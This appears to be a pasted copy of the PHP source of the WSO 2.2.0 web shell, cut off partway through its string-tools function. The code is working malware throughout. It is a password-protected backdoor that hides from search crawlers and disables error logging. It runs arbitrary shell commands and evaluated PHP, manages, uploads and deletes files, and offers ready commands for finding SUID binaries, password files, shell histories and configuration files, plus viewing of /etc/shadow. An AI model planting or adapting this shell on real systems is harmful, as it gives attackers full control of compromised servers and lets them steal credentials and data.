· 5 years ago · Mar 02, 2020, 02:50 PM
1<?php
2/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
3$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$color = "#fff";
5$default_action = 'FilesMan';
6@define('SELF_PATH', __FILE__);
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
11@session_start();
12@error_reporting(0);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',0);
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@set_magic_quotes_runtime(0);
18@define('VERSION', '2.2.0');
19if( get_magic_quotes_gpc() ) {
20 function stripslashes_array($array) {
21 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
22 }
23 $_POST = stripslashes_array($_POST);
24}
25function printLogin() {
26 ?>
27 <center>
28 <form method=post style="font-family:fantasy;">
29 Password: <input type=password name=pass style="background-color:whitesmoke;border:1px solid #FFF;"><input type=submit value='>>' style="border:none;background-color:teal;color:#fff;">
30 </form></center>
31 <?php
32 exit;
33}
34if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
35 if( empty( $auth_pass ) ||
36 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
37 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
38 else
39 printLogin();
40if( strtolower( substr(PHP_OS,0,3) ) == "win" )
41 $os = 'win';
42else
43 $os = 'nix';
44$safe_mode = @ini_get('safe_mode');
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
47if( isset( $_POST['c'] ) )
48 @chdir($_POST['c']);
49$cwd = @getcwd();
50if( $os == 'win') {
51 $home_cwd = str_replace("\\", "/", $home_cwd);
52 $cwd = str_replace("\\", "/", $cwd);
53}
54if( $cwd[strlen($cwd)-1] != '/' )
55 $cwd .= '/';
56
57if($os == 'win')
58 $aliases = array(
59 "List Directory" => "dir",
60 "Find index.php in current dir" => "dir /s /w /b index.php",
61 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
62 "Show active connections" => "netstat -an",
63 "Show running services" => "net start",
64 "User accounts" => "net user",
65 "Show computers" => "net view",
66 "ARP Table" => "arp -a",
67 "IP Configuration" => "ipconfig /all"
68 );
69else
70 $aliases = array(
71 "List dir" => "ls -la",
72 "list file attributes on a Linux second extended file system" => "lsattr -va",
73 "show opened ports" => "netstat -an | grep -i listen",
74 "Find" => "",
75 "find all suid files" => "find / -type f -perm -04000 -ls",
76 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
77 "find all sgid files" => "find / -type f -perm -02000 -ls",
78 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
79 "find config.inc.php files" => "find / -type f -name config.inc.php",
80 "find config* files" => "find / -type f -name \"config*\"",
81 "find config* files in current dir" => "find . -type f -name \"config*\"",
82 "find all writable folders and files" => "find / -perm -2 -ls",
83 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
84 "find all service.pwd files" => "find / -type f -name service.pwd",
85 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
86 "find all .htpasswd files" => "find / -type f -name .htpasswd",
87 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
88 "find all .bash_history files" => "find / -type f -name .bash_history",
89 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
90 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
91 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
92 "Locate" => "",
93 "locate httpd.conf files" => "locate httpd.conf",
94 "locate vhosts.conf files" => "locate vhosts.conf",
95 "locate proftpd.conf files" => "locate proftpd.conf",
96 "locate psybnc.conf files" => "locate psybnc.conf",
97 "locate my.conf files" => "locate my.conf",
98 "locate admin.php files" =>"locate admin.php",
99 "locate cfg.php files" => "locate cfg.php",
100 "locate conf.php files" => "locate conf.php",
101 "locate config.dat files" => "locate config.dat",
102 "locate config.php files" => "locate config.php",
103 "locate config.inc files" => "locate config.inc",
104 "locate config.inc.php" => "locate config.inc.php",
105 "locate config.default.php files" => "locate config.default.php",
106 "locate config* files " => "locate config",
107 "locate .conf files"=>"locate '.conf'",
108 "locate .pwd files" => "locate '.pwd'",
109 "locate .sql files" => "locate '.sql'",
110 "locate .htpasswd files" => "locate '.htpasswd'",
111 "locate .bash_history files" => "locate '.bash_history'",
112 "locate .mysql_history files" => "locate '.mysql_history'",
113 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
114 "locate backup files" => "locate backup",
115 "locate dump files" => "locate dump",
116 "locate priv files" => "locate priv"
117 );
118function printHeader() {
119 if(empty($_POST['charset']))
120 $_POST['charset'] = "UTF-8";
121 global $color;
122 ?>
123<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
124<style>
125 body {background-color:#000;color:#e1e1e1;}
126 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
127 table.info {color:#C3C3C3;background-color:#000;}
128 span,h1,a {color:<?=$color?> !important;}
129 span {font-weight:bolder;}
130 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
131 div.content {padding:5px;margin-left:5px;background-color:#000;}
132 a {text-decoration:none;}
133 a:hover {text-decoration:underline;}
134 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
135 .bigarea {width:100%;height:250px; }
136 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
137 form {margin:0px;}
138 #toolsTbl {text-align:center;}
139 .toolsInp {width:300px}
140 .main th {text-align:left;background-color:#000;}
141 .main tr:hover{background-color:#5e5e5e}
142 .main td, th{vertical-align:middle}
143 .l1 {background-color:#444}
144 pre {font:9pt Courier New;}
145</style>
146<script>
147 function set(a,c,p1,p2,p3,charset) {
148 if(a != null)document.mf.a.value=a;
149 if(c != null)document.mf.c.value=c;
150 if(p1 != null)document.mf.p1.value=p1;
151 if(p2 != null)document.mf.p2.value=p2;
152 if(p3 != null)document.mf.p3.value=p3;
153 if(charset != null)document.mf.charset.value=charset;
154 }
155 function g(a,c,p1,p2,p3,charset) {
156 set(a,c,p1,p2,p3,charset);
157 document.mf.submit();
158 }
159 function a(a,c,p1,p2,p3,charset) {
160 set(a,c,p1,p2,p3,charset);
161 var params = "ajax=true";
162 for(i=0;i<document.mf.elements.length;i++)
163 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
164 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
165 }
166 function sr(url, params) {
167 if (window.XMLHttpRequest) {
168 req = new XMLHttpRequest();
169 req.onreadystatechange = processReqChange;
170 req.open("POST", url, true);
171 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
172 req.send(params);
173 }
174 else if (window.ActiveXObject) {
175 req = new ActiveXObject("Microsoft.XMLHTTP");
176 if (req) {
177 req.onreadystatechange = processReqChange;
178 req.open("POST", url, true);
179 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
180 req.send(params);
181 }
182 }
183 }
184 function processReqChange() {
185 if( (req.readyState == 4) )
186 if(req.status == 200) {
187 //alert(req.responseText);
188 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
189 var arr=reg.exec(req.responseText);
190 eval(arr[2].substr(0, arr[1]));
191 }
192 else alert("Request error!");
193 }
194</script>
195<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
196<form method=post name=mf style='display:none;'>
197<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
198<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
199<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
200<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
201<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
202<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
203</form>
204<?php
205 $freeSpace = @diskfreespace($GLOBALS['cwd']);
206 $totalSpace = @disk_total_space($GLOBALS['cwd']);
207 $totalSpace = $totalSpace?$totalSpace:1;
208 $release = @php_uname('r');
209 $kernel = @php_uname('s');
210 $millink='https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';
211 if( strpos('Linux', $kernel) !== false )
212 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
213 else
214 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
215 if(!function_exists('posix_getegid')) {
216 $user = @get_current_user();
217 $uid = @getmyuid();
218 $gid = @getmygid();
219 $group = "?";
220 } else {
221 $uid = @posix_getpwuid(@posix_geteuid());
222 $gid = @posix_getgrgid(@posix_getegid());
223 $user = $uid['name'];
224 $uid = $uid['uid'];
225 $group = $gid['name'];
226 $gid = $gid['gid'];
227 }
228 $cwd_links = '';
229 $path = explode("/", $GLOBALS['cwd']);
230 $n=count($path);
231 for($i=0;$i<$n-1;$i++) {
232 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
233 for($j=0;$j<=$i;$j++)
234 $cwd_links .= $path[$j].'/';
235 $cwd_links .= "\")'>".$path[$i]."/</a>";
236 }
237 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
238 $opt_charsets = '';
239 foreach($charsets as $item)
240 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
241 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
242
243 if(!empty($GLOBALS['auth_pass']))
244 $m['Logout'] = 'Logout';
245 $m['Self remove'] = 'SelfRemove';
246 $menu = '';
247 foreach($m as $k => $v)
248 $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
249 $drives = "";
250 if ($GLOBALS['os'] == 'win') {
251 foreach( range('a','z') as $drive )
252 if (is_dir($drive.':\\'))
253 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
254 }
255 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
256 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-Git]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
257 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
258 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
259}
260function printFooter() {
261 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
262?>
263</div>
264<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
265 <tr>
266 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
267 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
268 </tr>
269 <tr>
270 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
271 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
272 </tr>
273 <tr>
274 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
275 <td><form method='post' ENCTYPE='multipart/form-data'>
276 <input type=hidden name=a value='FilesMAn'>
277 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
278 <input type=hidden name=p1 value='uploadFile'>
279 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
280 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
281 </tr>
282
283</table>
284</div>
285</body></html>
286<?php
287}
288if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
289if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
290function ex($in) {
291 $out = '';
292 if(function_exists('exec')) {
293 @exec($in,$out);
294 $out = @join("\n",$out);
295 }elseif(function_exists('passthru')) {
296 ob_start();
297 @passthru($in);
298 $out = ob_get_clean();
299 }elseif(function_exists('system')) {
300 ob_start();
301 @system($in);
302 $out = ob_get_clean();
303 }elseif(function_exists('shell_exec')) {
304 $out = shell_exec($in);
305 }elseif(is_resource($f = @popen($in,"r"))) {
306 $out = "";
307 while(!@feof($f))
308 $out .= fread($f,1024);
309 pclose($f);
310 }
311 return $out;
312}
313function viewSize($s) {
314 if($s >= 1073741824)
315 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
316 elseif($s >= 1048576)
317 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
318 elseif($s >= 1024)
319 return sprintf('%1.2f', $s / 1024 ) . ' KB';
320 else
321 return $s . ' B';
322}
323function perms($p) {
324 if (($p & 0xC000) == 0xC000)$i = 's';
325 elseif (($p & 0xA000) == 0xA000)$i = 'l';
326 elseif (($p & 0x8000) == 0x8000)$i = '-';
327 elseif (($p & 0x6000) == 0x6000)$i = 'b';
328 elseif (($p & 0x4000) == 0x4000)$i = 'd';
329 elseif (($p & 0x2000) == 0x2000)$i = 'c';
330 elseif (($p & 0x1000) == 0x1000)$i = 'p';
331 else $i = 'u';
332 $i .= (($p & 0x0100) ? 'r' : '-');
333 $i .= (($p & 0x0080) ? 'w' : '-');
334 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
335 $i .= (($p & 0x0020) ? 'r' : '-');
336 $i .= (($p & 0x0010) ? 'w' : '-');
337 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
338 $i .= (($p & 0x0004) ? 'r' : '-');
339 $i .= (($p & 0x0002) ? 'w' : '-');
340 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
341 return $i;
342}
343function viewPermsColor($f) {
344 if (!@is_readable($f))
345 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
346 elseif (!@is_writable($f))
347 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
348 else
349 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
350}
351if(!function_exists("scandir")) {
352 function scandir($dir) {
353 $dh = opendir($dir);
354 while (false !== ($filename = readdir($dh))) {
355 $files[] = $filename;
356 }
357 return $files;
358 }
359}
360function which($p) {
361 $path = ex('which '.$p);
362 if(!empty($path))
363 return $path;
364 return false;
365}
366function actionSecInfo() {
367 printHeader();
368 echo '<h1>Server security information</h1><div class=content>';
369 function showSecParam($n, $v) {
370 $v = trim($v);
371 if($v) {
372 echo '<span>'.$n.': </span>';
373 if(strpos($v, "\n") === false)
374 echo $v.'<br>';
375 else
376 echo '<pre class=ml1>'.$v.'</pre>';
377 }
378 }
379
380 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
381 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
382 showSecParam('Open base dir', @ini_get('open_basedir'));
383 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
384 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
385 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
386 $temp=array();
387 if(function_exists('mysql_get_client_info'))
388 $temp[] = "MySql (".mysql_get_client_info().")";
389 if(function_exists('mssql_connect'))
390 $temp[] = "MSSQL";
391 if(function_exists('pg_connect'))
392 $temp[] = "PostgreSQL";
393 if(function_exists('oci_connect'))
394 $temp[] = "Oracle";
395 showSecParam('Supported databases', implode(', ', $temp));
396 echo '<br>';
397
398 if( $GLOBALS['os'] == 'nix' ) {
399 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
400 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
401 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
402 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
403 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
404 showSecParam('OS version', @file_get_contents('/proc/version'));
405 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
406 if(!$GLOBALS['safe_mode']) {
407 echo '<br>';
408 $temp=array();
409 foreach ($userful as $item)
410 if(which($item)){$temp[]=$item;}
411 showSecParam('Userful', implode(', ',$temp));
412 $temp=array();
413 foreach ($danger as $item)
414 if(which($item)){$temp[]=$item;}
415 showSecParam('Danger', implode(', ',$temp));
416 $temp=array();
417 foreach ($downloaders as $item)
418 if(which($item)){$temp[]=$item;}
419 showSecParam('Downloaders', implode(', ',$temp));
420 echo '<br/>';
421 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
422 showSecParam('HDD space', ex('df -h'));
423 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
424 }
425 } else {
426 showSecParam('OS Version',ex('ver'));
427 showSecParam('Account Settings',ex('net accounts'));
428 showSecParam('User Accounts',ex('net user'));
429 }
430 echo '</div>';
431 printFooter();
432}
433function actionPhp() {
434 if( isset($_POST['ajax']) ) {
435 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
436 ob_start();
437 eval($_POST['p1']);
438 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
439 echo strlen($temp), "\n", $temp;
440 exit;
441 }
442 printHeader();
443 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
444 echo '<h1>PHP info</h1><div class=content>';
445 ob_start();
446 phpinfo();
447 $tmp = ob_get_clean();
448 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
449 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
450 $tmp = preg_replace('!h1!msiU','h2',$tmp);
451 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
452 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
453 echo $tmp;
454 echo '</div><br>';
455 }
456 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
457 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
458 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
459 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
460 if(!empty($_POST['p1'])) {
461 ob_start();
462 eval($_POST['p1']);
463 echo htmlspecialchars(ob_get_clean());
464 }
465 echo '</pre></div>';
466 printFooter();
467}
468function actionFilesMan() {
469 printHeader();
470 echo '<h1>File manager</h1><div class=content>';
471 if(isset($_POST['p1'])) {
472 switch($_POST['p1']) {
473 case 'uploadFile':
474 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
475 echo "Can't upload file!";
476 break;
477 break;
478 case 'mkdir':
479 if(!@mkdir($_POST['p2']))
480 echo "Can't create new dir";
481 break;
482 case 'delete':
483 function deleteDir($path) {
484 $path = (substr($path,-1)=='/') ? $path:$path.'/';
485 $dh = opendir($path);
486 while ( ($item = readdir($dh) ) !== false) {
487 $item = $path.$item;
488 if ( (basename($item) == "..") || (basename($item) == ".") )
489 continue;
490 $type = filetype($item);
491 if ($type == "dir")
492 deleteDir($item);
493 else
494 @unlink($item);
495 }
496 closedir($dh);
497 rmdir($path);
498 }
499 if(is_array(@$_POST['f']))
500 foreach($_POST['f'] as $f) {
501 $f = urldecode($f);
502 if(is_dir($f))
503 deleteDir($f);
504 else
505 @unlink($f);
506 }
507 break;
508 case 'paste':
509 if($_SESSION['act'] == 'copy') {
510 function copy_paste($c,$s,$d){
511 if(is_dir($c.$s)){
512 mkdir($d.$s);
513 $h = opendir($c.$s);
514 while (($f = readdir($h)) !== false)
515 if (($f != ".") and ($f != "..")) {
516 copy_paste($c.$s.'/',$f, $d.$s.'/');
517 }
518 } elseif(is_file($c.$s)) {
519 @copy($c.$s, $d.$s);
520 }
521 }
522 foreach($_SESSION['f'] as $f)
523 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
524 } elseif($_SESSION['act'] == 'move') {
525 function move_paste($c,$s,$d){
526 if(is_dir($c.$s)){
527 mkdir($d.$s);
528 $h = opendir($c.$s);
529 while (($f = readdir($h)) !== false)
530 if (($f != ".") and ($f != "..")) {
531 copy_paste($c.$s.'/',$f, $d.$s.'/');
532 }
533 } elseif(is_file($c.$s)) {
534 @copy($c.$s, $d.$s);
535 }
536 }
537 foreach($_SESSION['f'] as $f)
538 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
539 }
540 unset($_SESSION['f']);
541 break;
542 default:
543 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
544 $_SESSION['act'] = @$_POST['p1'];
545 $_SESSION['f'] = @$_POST['f'];
546 foreach($_SESSION['f'] as $k => $f)
547 $_SESSION['f'][$k] = urldecode($f);
548 $_SESSION['cwd'] = @$_POST['c'];
549 }
550 break;
551 }
552 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
553 }
554 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
555 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
556 global $sort;
557 $sort = array('name', 1);
558 if(!empty($_POST['p1'])) {
559 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
560 $sort = array($match[1], (int)$match[2]);
561 }
562?>
563<script>
564 function sa() {
565 for(i=0;i<document.files.elements.length;i++)
566 if(document.files.elements[i].type == 'checkbox')
567 document.files.elements[i].checked = document.files.elements[0].checked;
568 }
569</script>
570<table width='100%' class='main' cellspacing='0' cellpadding='2'>
571<form name=files method=post>
572<?php
573 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
574 $dirs = $files = $links = array();
575 $n = count($dirContent);
576 for($i=0;$i<$n;$i++) {
577 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
578 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
579 $tmp = array('name' => $dirContent[$i],
580 'path' => $GLOBALS['cwd'].$dirContent[$i],
581 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
582 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
583 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
584 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
585 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
586 );
587 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
588 $files[] = array_merge($tmp, array('type' => 'file'));
589 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
590 $links[] = array_merge($tmp, array('type' => 'link'));
591 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
592 $dirs[] = array_merge($tmp, array('type' => 'dir'));
593 }
594 $GLOBALS['sort'] = $sort;
595 function cmp($a, $b) {
596 if($GLOBALS['sort'][0] != 'size')
597 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
598 else
599 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
600 }
601 usort($files, "cmp");
602 usort($dirs, "cmp");
603 usort($links, "cmp");
604 $files = array_merge($dirs, $links, $files);
605 $l = 0;
606 foreach($files as $f) {
607 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
608 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
609 $l = $l?0:1;
610 }
611 ?>
612 <tr><td colspan=7>
613 <input type=hidden name=a value='FilesMan'>
614 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
615 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
616 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
617 </form></table></div>
618 <?php
619 printFooter();
620}
621function actionStringTools() {
622 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
623 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
624 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
625 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
626
627 if(isset($_POST['ajax'])) {
628 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
629 ob_start();
630 if(function_exists($_POST['p1']))
631 echo $_POST['p1']($_POST['p2']);
